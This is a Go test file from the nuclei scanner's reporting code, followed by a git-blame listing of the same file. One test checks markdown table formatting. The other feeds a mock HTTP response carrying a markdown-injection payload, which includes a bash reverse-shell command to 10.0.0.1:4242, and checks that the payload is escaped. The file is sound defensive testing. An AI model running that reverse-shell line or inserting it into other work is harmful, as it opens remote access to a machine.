nuclei/pkg/reporting/format/format_utils_test.go

package format

import (
	"fmt"
	"strings"
	"testing"

	"github.com/projectdiscovery/nuclei/v3/pkg/model"
	"github.com/projectdiscovery/nuclei/v3/pkg/model/types/severity"
	"github.com/projectdiscovery/nuclei/v3/pkg/model/types/stringslice"
	"github.com/projectdiscovery/nuclei/v3/pkg/output"
	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/markdown/util"
	"github.com/stretchr/testify/require"
)

func TestToMarkdownTableString(t *testing.T) {
	info := model.Info{
		Name:           "Test Template Name",
		Authors:        stringslice.StringSlice{Value: []string{"forgedhallpass", "ice3man"}},
		Description:    "Test description",
		SeverityHolder: severity.Holder{Severity: severity.High},
		Tags:           stringslice.StringSlice{Value: []string{"cve", "misc"}},
		Reference:      stringslice.NewRawStringSlice("reference1"),
		Metadata: map[string]interface{}{
			"customDynamicKey1": "customDynamicValue1",
			"customDynamicKey2": "customDynamicValue2",
		},
	}

	result := CreateTemplateInfoTable(&info, &util.MarkdownFormatter{})

	expectedOrderedAttributes := `| Key | Value |
| --- | --- |
| Name | Test Template Name |
| Authors | forgedhallpass, ice3man |
| Tags | cve, misc |
| Severity | high |
| Description | Test description |`

	expectedDynamicAttributes := []string{
		"| customDynamicKey1 | customDynamicValue1 |",
		"| customDynamicKey2 | customDynamicValue2 |",
		"", // the expected result ends in a new line (\n)
	}

	actualAttributeSlice := strings.Split(result, "\n")
	dynamicAttributeIndex := len(actualAttributeSlice) - len(expectedDynamicAttributes)
	require.Equal(t, strings.Split(expectedOrderedAttributes, "\n"), actualAttributeSlice[:dynamicAttributeIndex]) // the first part of the result is ordered
	require.ElementsMatch(t, expectedDynamicAttributes, actualAttributeSlice[dynamicAttributeIndex:])              // dynamic parameters are not ordered
}

func TestCreateReportDescription_MarkdownInjection(t *testing.T) {
	// Setup a mock result event with malicious payload in various fields
	event := &output.ResultEvent{
		TemplateID: "test-template",
		Host:       "example.com",
		Matched:    "https://example.com/vulnerable",
		Type:       "http",
		Info: model.Info{
			Name:           "Test Template",
			Authors:        stringslice.StringSlice{Value: []string{"researcher"}},
			SeverityHolder: severity.Holder{Severity: severity.High},
			Tags:           stringslice.StringSlice{Value: []string{"test"}},
		},
		Request:     "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n",
		Response:    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>Hello, world\r\n\r\n```\r\n\r\nReferences:\r\n- https://rce.ee/pwned\r\n\r\n**CURL command**\r\n```sh\r\nbash -i >& /dev/tcp/10.0.0.1/4242 0>&1\r\n```\r\n</body></html>",
		CURLCommand: "curl -X GET https://example.com",
	}

	result := CreateReportDescription(event, &util.MarkdownFormatter{}, false)
	fmt.Println(result)

	require.NotContains(t, result, "```\r\n\r\nReferences:\r\n- https://rce.ee/pwned")
	require.NotContains(t, result, "```sh\r\nbash -i >& /dev/tcp")
}
Re-introducing custom template info attribute support within the new struct * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 18:37:43 +03:00			`package format`

			`import (`
feat: escape code blocks for markdown formatting (#6089) 2025-03-07 14:45:39 +05:30			`"fmt"`
Re-introducing custom template info attribute support within the new struct * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 18:37:43 +03:00			`"strings"`
			`"testing"`

nuclei v3 : misc updates (#4247) * use parsed options while signing * update project layout to v3 * fix .gitignore * remove example template * misc updates * bump tlsx version * hide template sig warning with env * js: retain value while using log * fix nil pointer derefernce * misc doc update --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-10-17 17:44:13 +05:30			`"github.com/projectdiscovery/nuclei/v3/pkg/model"`
			`"github.com/projectdiscovery/nuclei/v3/pkg/model/types/severity"`
			`"github.com/projectdiscovery/nuclei/v3/pkg/model/types/stringslice"`
feat: escape code blocks for markdown formatting (#6089) 2025-03-07 14:45:39 +05:30			`"github.com/projectdiscovery/nuclei/v3/pkg/output"`
nuclei v3 : misc updates (#4247) * use parsed options while signing * update project layout to v3 * fix .gitignore * remove example template * misc updates * bump tlsx version * hide template sig warning with env * js: retain value while using log * fix nil pointer derefernce * misc doc update --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-10-17 17:44:13 +05:30			`"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/markdown/util"`
merging caches + removing import cycle via type any 2024-03-13 02:27:15 +01:00			`"github.com/stretchr/testify/require"`
Re-introducing custom template info attribute support within the new struct * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 18:37:43 +03:00			`)`

			`func TestToMarkdownTableString(t *testing.T) {`
			`info := model.Info{`
			`Name: "Test Template Name",`
YAML Unmarshal error in reporting template #995 2021-09-03 16:48:39 +03:00			`Authors: stringslice.StringSlice{Value: []string{"forgedhallpass", "ice3man"}},`
Re-introducing custom template info attribute support within the new struct * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 18:37:43 +03:00			`Description: "Test description",`
YAML Unmarshal error in reporting template #995 2021-09-03 16:48:39 +03:00			`SeverityHolder: severity.Holder{Severity: severity.High},`
			`Tags: stringslice.StringSlice{Value: []string{"cve", "misc"}},`
Omit Empty Fields (#3977) * Don't show Lines/matched-line on null * Remove unused "info.references" property * Revert "Remove unused "info.references" property" This reverts commit 6466644bcac6952ece8d2bc880ea9157f2e10c16. * Switch to pointer so omitempty works properly * keeping matcher status output in jsonl output always * rename function to NewRawStringSlice --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> Co-authored-by: Tarun Koyalwar <tarun@projectdiscovery.io> 2023-07-28 10:18:15 -04:00			`Reference: stringslice.NewRawStringSlice("reference1"),`
feat(template): allow custom type in metadata In some case you may need to use custom type in `metadata`, like nested array or nested k-v: ```yaml info: metadata: components: - bootstrap - jquery ``` So this commit allowed use any custom type in `metadata`. 2022-02-27 22:28:00 +08:00			`Metadata: map[string]interface{}{`
Re-introducing custom template info attribute support within the new struct * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 18:37:43 +03:00			`"customDynamicKey1": "customDynamicValue1",`
			`"customDynamicKey2": "customDynamicValue2",`
			`},`
			`}`

fix(reporting): Markdown and Jira exporter fixes (#3849) * fix(reporting): Markdown and Jira exporter fixes * removed the code duplication between the Markdown and Jira exporter * markdown requires at least 3 dashes in the cells to separate headers from contents in a table * fixed the Jira link creation in the description * Jira requires at least 4 dashes for a horizontal line * added tests * Jira doesn't use dashed separators between table headers and contents * fix(reporting): Markdown and Jira exporter fixes * satisfying the linter * minor syntax changes --------- Co-authored-by: Mzack9999 <mzack9999@protonmail.com> 2023-06-22 14:27:32 +03:00			`result := CreateTemplateInfoTable(&info, &util.MarkdownFormatter{})`
Re-introducing custom template info attribute support within the new struct * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 18:37:43 +03:00
fix(reporting): Markdown and Jira exporter fixes (#3849) * fix(reporting): Markdown and Jira exporter fixes * removed the code duplication between the Markdown and Jira exporter * markdown requires at least 3 dashes in the cells to separate headers from contents in a table * fixed the Jira link creation in the description * Jira requires at least 4 dashes for a horizontal line * added tests * Jira doesn't use dashed separators between table headers and contents * fix(reporting): Markdown and Jira exporter fixes * satisfying the linter * minor syntax changes --------- Co-authored-by: Mzack9999 <mzack9999@protonmail.com> 2023-06-22 14:27:32 +03:00			expectedOrderedAttributes := `\| Key \| Value \|
			`\| --- \| --- \|`
			`\| Name \| Test Template Name \|`
Re-introducing custom template info attribute support within the new struct * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 18:37:43 +03:00			`\| Authors \| forgedhallpass, ice3man \|`
			`\| Tags \| cve, misc \|`
			`\| Severity \| high \|`
			\| Description \| Test description \|`

			`expectedDynamicAttributes := []string{`
			`"\| customDynamicKey1 \| customDynamicValue1 \|",`
			`"\| customDynamicKey2 \| customDynamicValue2 \|",`
			`"", // the expected result ends in a new line (\n)`
			`}`

			`actualAttributeSlice := strings.Split(result, "\n")`
			`dynamicAttributeIndex := len(actualAttributeSlice) - len(expectedDynamicAttributes)`
merging caches + removing import cycle via type any 2024-03-13 02:27:15 +01:00			`require.Equal(t, strings.Split(expectedOrderedAttributes, "\n"), actualAttributeSlice[:dynamicAttributeIndex]) // the first part of the result is ordered`
			`require.ElementsMatch(t, expectedDynamicAttributes, actualAttributeSlice[dynamicAttributeIndex:]) // dynamic parameters are not ordered`
Re-introducing custom template info attribute support within the new struct * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 18:37:43 +03:00			`}`
feat: escape code blocks for markdown formatting (#6089) 2025-03-07 14:45:39 +05:30
			`func TestCreateReportDescription_MarkdownInjection(t *testing.T) {`
			`// Setup a mock result event with malicious payload in various fields`
			`event := &output.ResultEvent{`
			`TemplateID: "test-template",`
			`Host: "example.com",`
			`Matched: "https://example.com/vulnerable",`
			`Type: "http",`
			`Info: model.Info{`
			`Name: "Test Template",`
			`Authors: stringslice.StringSlice{Value: []string{"researcher"}},`
			`SeverityHolder: severity.Holder{Severity: severity.High},`
			`Tags: stringslice.StringSlice{Value: []string{"test"}},`
			`},`
			`Request: "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n",`
			Response: "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>Hello, world\r\n\r\n```\r\n\r\nReferences:\r\n- https://rce.ee/pwned\r\n\r\nCURL command\r\n```sh\r\nbash -i >& /dev/tcp/10.0.0.1/4242 0>&1\r\n```\r\n</body></html>",
			`CURLCommand: "curl -X GET https://example.com",`
			`}`

			`result := CreateReportDescription(event, &util.MarkdownFormatter{}, false)`
			`fmt.Println(result)`

			require.NotContains(t, result, "```\r\n\r\nReferences:\r\n- https://rce.ee/pwned")
			require.NotContains(t, result, "```sh\r\nbash -i >& /dev/tcp")
			`}`